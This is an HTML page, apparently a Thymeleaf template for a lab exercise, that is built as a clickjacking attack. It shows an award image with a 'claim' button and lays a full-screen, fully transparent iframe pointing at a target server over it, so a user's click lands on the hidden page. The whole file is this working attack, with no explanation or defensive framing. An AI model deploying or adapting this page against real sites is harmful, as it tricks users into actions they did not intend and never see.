<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <style>
        body {
            text-align: center;
        }
        img {
            height: 300px;
        }
        input{
            border: 1px solid #ffdbdb;
            background: #ff8a8a;
            border-radius: 30px;
            width: 60px;
            height: 60px;
            color: white;
            font-size: 26px;
        }
        iframe{
            position: absolute;
            top: 0;
            left: 0;
            border: 0;
            width: 100%;
            height: 100%;
            opacity: 0;
        }
    </style>
</head>
<body>
<form action="/like/id_123">
    <img th:src="@{/img/award.jpeg}"  />
    <div>
        <input type="submit" value="领">
    </div>
</form>
<iframe src="http://server.zmy.local:8080/target"></iframe>
</body>
</html>